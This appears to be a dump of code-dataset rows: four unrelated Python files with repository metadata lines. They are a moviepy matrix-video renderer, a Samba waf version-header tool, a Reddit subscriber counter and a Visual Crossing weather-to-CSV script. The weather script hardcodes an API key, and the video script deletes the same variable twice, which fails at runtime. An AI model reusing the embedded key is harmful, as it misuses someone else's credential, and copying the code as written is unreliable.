# Build one TextClip per frame: the raw matrix string (wrapped every ~100
# characters at a ')' boundary), optionally a pretty-printed ordinal
# expression, and a frame-counter overlay.
for i in range(start,end):
    # Wrap the matrix string: insert a newline after a ')' once at least
    # 100 characters have accumulated on the current line.
    a=''
    k=0
    for j in M[i]:
        a+=j
        k+=1
        if k>=100 and j==')':a+='\n';k=0
    obj=me.TextClip(a.replace('(0)(2)','Limit of BMS'),size=(1920,500),color='white',fontsize=25,method='label',align='northwest')
    clips.append(obj.set_start((i-start)/speed).set_duration(1/speed).set_pos((10,100)))
    # Only matrices below this threshold get the (expensive) ordinal
    # overlay; prettyprint/toexp/matfromstr come from bm_analyze.
    if parseMatrix(M[i])<[[0],[1,1,1],[2,1,1],[3,1,1],[2,1,1],[3,1],[2]]:
        obj=me.TextClip(prettyprint(toexp(matfromstr(M[i])[0])),size=(1920,600),color='white',fontsize=30,method='label',align='west',font='Courier-New')
        clips.append(obj.set_start((i-start)/speed).set_duration(1/speed).set_pos((10,500)))
    # Frame counter; 6660 frames/hour and 111 frames/minute look like the
    # generator's measured calculation rate -- TODO confirm.
    obj=me.TextClip('Frame {:,}\n≈ {}h {:02}m spent calculating'.format(i,i//6660,i//111%60),size=(1920,500),color='white',fontsize=20,method='label',align='northwest')
    clips.append(obj.set_start((i-start)/speed).set_duration(1/speed).set_pos((10,20)))
    # Progress logging: every 100 frames with the matrix, every 10 without.
    if i%100==0:
        print(i,M[i])
    # render=me.CompositeVideoClip(clips)
    # clips=[render]
    if i%10==0 and i%100!=0:
        print(i)
print('Finished creating text')
render=me.CompositeVideoClip(clips)
del clips
print('Finished adding text to the void')
# Append the newly rendered window to the previously rendered video file.
render_=me.VideoFileClip('BMSlngi.mp4')
me.concatenate([render_,render]).write_videofile(f'BMSlngi_.mp4',fps=24)
del render
del render_
del render_
| dr2xmillion371/stuff | matrix.py | matrix.py | py | 1,876 | python | en | code | 0 | github-code | 36 |
36891693929 | # a waf tool to add extension based build patterns for Samba
import Task
from TaskGen import extension
from samba_utils import *
from wafsamba import samba_version_file
def write_version_header(task):
    '''Generate the contents of Samba's version.h from the VERSION file.

    task.inputs[0] is the VERSION source file and task.outputs[0] the
    version.h target.  Returns 0 so waf treats the task as successful.
    '''
    src = task.inputs[0].srcpath(task.env)
    tgt = task.outputs[0].bldpath(task.env)

    version = samba_version_file(src, task.env.srcdir, env=task.env)
    string = str(version)

    f = open(tgt, 'w')
    try:
        # try/finally guarantees the handle is closed even if the write
        # fails (the original leaked the handle on error and bound the
        # write() result to an unused variable).
        f.write(string)
    finally:
        f.close()
    return 0
def SAMBA_MKVERSION(bld, target):
    '''generate the version.h header for Samba

    Registers a generator task that rebuilds *target* from the top-level
    VERSION file on every build (always=True), since the revision embedded
    in the header can change without VERSION itself changing.
    '''
    # The returned task object was previously bound to an unused local;
    # drop the binding since nothing uses it.
    bld.SAMBA_GENERATOR('VERSION',
                        rule=write_version_header,
                        source='VERSION',
                        target=target,
                        always=True)
Build.BuildContext.SAMBA_MKVERSION = SAMBA_MKVERSION
| RMerl/asuswrt-merlin | release/src/router/samba-3.6.x/buildtools/wafsamba/samba_patterns.py | samba_patterns.py | py | 861 | python | en | code | 6,715 | github-code | 36 |
10179826987 | #!/usr/bin/python3
"""
Number of subscribers(not active users,total subscribers) for a given subreddit
"""
import requests
def number_of_subscribers(subreddit):
    """Return the total subscriber count of a subreddit.

    Queries the Reddit API endpoint /r/<subreddit>/about.json and returns
    the ``subscribers`` field, or 0 when the name is invalid, the
    subreddit does not exist, or the request fails for any reason.
    """
    if subreddit is None or not isinstance(subreddit, str):
        return 0
    # Custom User-Agent avoids Reddit throttling the default client.
    user_agent = {'User-agent': 'Google Chrome Version 81.0.4044.129'}
    url = 'https://www.reddit.com/r/{}/about.json'.format(subreddit)
    try:
        # Non-existent subreddits redirect to a search page; disabling
        # redirects makes them surface as a non-200 status instead of a
        # confusing HTML/JSON payload. A timeout prevents hanging forever.
        response = requests.get(url, headers=user_agent,
                                allow_redirects=False, timeout=10)
        if response.status_code != 200:
            return 0
        return response.json()['data']['subscribers']
    except Exception:
        # Network failure, bad JSON, or missing keys all count as "0".
        return 0
| jamesAlhassan/alx-system_engineering-devops | 0x16-api_advanced/0-subs.py | 0-subs.py | py | 646 | python | en | code | 0 | github-code | 36 |
30218578553 | # %%
import codecs
import csv
import os
import sys
from urllib import error
from urllib import request

import numpy as np
import pandas as pd
# %%
# Date window for the Visual Crossing timeline query (a single day here).
initial_date = '2018-01-01'
final_date = '2018-01-01'

# Timeline endpoint for New York: hourly records, metric units, CSV output.
# NOTE(review): the API key is hardcoded; consider loading it from an
# environment variable instead of committing it.
_BASE = "https://weather.visualcrossing.com/VisualCrossingWebServices/rest/services/timeline/New%20York/"
_QUERY = "?unitGroup=metric&include=hours&key=HB4HE49PF5XCRSEHAULTVM73D&contentType=csv"
url = "{}{}/{}{}".format(_BASE, initial_date, final_date, _QUERY)
# %%
# Fetch the CSV weather report. HTTPError is handled before URLError
# because it is a subclass of it.
try:
    ResultBytes = request.urlopen(url)
    # Parse the results as CSV (lazily decoded from the byte stream).
    CSVText = csv.reader(codecs.iterdecode(ResultBytes, 'utf-8'))
except error.HTTPError as e:
    # The HTTP error body usually carries the API's explanation.
    ErrorInfo = e.read().decode()
    print('Error code: ', e.code, ErrorInfo)
    sys.exit()
except error.URLError as e:
    # URLError (e.g. DNS failure) carries no response body or status
    # code, only a reason; the original e.read()/e.code calls would
    # themselves raise AttributeError here.
    print('Error reason: ', e.reason)
    sys.exit()
# %%
# Materialize the CSV rows once: a[0] is the header, a[1:] are data rows.
a = list(CSVText)
# %%
# Build the dataframe in a single constructor call instead of the
# original row-by-row df.loc inserts (quadratic in pandas). The index
# starts at 1 to match the original layout, where row 0 was consumed
# as the header and data rows were inserted at indexes 1..len(a)-1.
df = pd.DataFrame(a[1:], columns=a[0], index=range(1, len(a)))
# %%
# Drop "name" and "stations": constant for every row of this query, so
# they carry no information for our analysis.
df.drop(['name', 'stations'], axis=1, inplace=True)
# Rewrite the "icon" column so it only records whether it is day or night.
def day_night(icon):
    """Reduce a Visual Crossing icon name to its final segment.

    Icons look like 'partly-cloudy-day'; only the last hyphen-separated
    part ('day' or 'night') is kept.
    """
    parts = icon.rsplit('-', 1)
    return parts[-1]
# %%
# Collapse each icon name to just 'day'/'night'.
df.icon = df.icon.apply(day_night)
# df will serve as the fact table ("weather"); the "conditions" and
# "icon" columns are split out into two dimension tables: condition and
# icon, respectively.
# %%
condition = pd.DataFrame()
# %%
condition['condicion'] = df.conditions.unique()
# %%
icon = pd.DataFrame()
# %%
icon['estado'] = df.icon.unique()
# Replace the values in the main table with the id (index) values from
# the dimension tables.
# %%
def estado(i):
    """Map an icon value to its row index in the `icon` dimension table."""
    # df.icon has already been reduced by day_night, so the split is a
    # no-op for current data; kept for parity with the raw icon format.
    key = i.rsplit('-', 1)[-1]
    matches = icon.index[icon.estado == key]
    return matches[0]
def cond(i):
    """Map a condition string to its row index in the `condition` table.

    The dimension table stores the full strings from
    df.conditions.unique(), so the value is looked up verbatim. The
    previous implementation split on '-' and kept the last piece, which
    raised IndexError for any condition text containing a hyphen.
    """
    return condition[condition.condicion == i].index[0]
# %%
# Swap the raw values in the fact table for foreign-key indexes into
# the dimension tables.
df.icon = df.icon.apply(estado)
# %%
df.conditions = df.conditions.apply(cond)
# %% [markdown]
# Convert every column to the pandas 'string' dtype.
# %%
for i in df:
    df[i] = df[i].astype('string')
# %%
icon.estado = icon.estado.astype('string')
condition.condicion = condition.condicion.astype('string')
# %% [markdown]
# Write the weather fact table and the icon/condition dimension tables
# out as CSV files.
# %%
df.to_csv('weather.csv')
icon.to_csv('icono.csv')
condition.to_csv('condicion.csv')
| FabianTatum/GRUPO-14-TAXIS-TRIPS | API weather/apiWeather.py | apiWeather.py | py | 2,964 | python | en | code | 1 | github-code | 36 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.